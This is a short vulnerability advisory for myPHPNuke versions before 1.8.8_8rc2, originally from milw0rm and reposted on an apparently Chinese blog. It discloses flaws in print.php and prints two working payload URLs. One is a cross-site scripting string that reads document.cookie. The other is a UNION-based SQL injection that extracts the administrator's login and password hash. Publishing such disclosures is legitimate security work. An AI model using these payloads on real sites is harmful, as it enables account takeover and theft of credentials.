Articles

myPHPNuke < 1.8.8_8rc2 (XSS/SQL) Multiple Remote Vulnerabilities

作者: 天晴无名氏  日期: 2008-09-08 21:46

字体大小:
############################################################

Cross-Site Scripting and SQL Injection vulnerabilities in myPHPNuke

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2391/

Description: There are Cross-Site Scripting and SQL Injection vulnerabilities in print.php in myPHPNuke.

XSS:

http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E

SQL Injection:

http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1

With this query you will receive login and password (hash) of administrator.

Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the additional filters were added, so it is not vulnerable to these XSS and SQL Injection attacks. But version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL Injection attack is possible (without using spaces and brackets).

############################################################

# milw0rm.com
引用通告地址: 点击获取引用地址
标签: myPHPNuke
评论: 0 | 引用: 0 | 阅读: 103
 加入网摘
发表评论
昵 称: 密 码:
网 址: 邮 箱:
验证码: 验证码图片 选 项:
头 像:
内 容: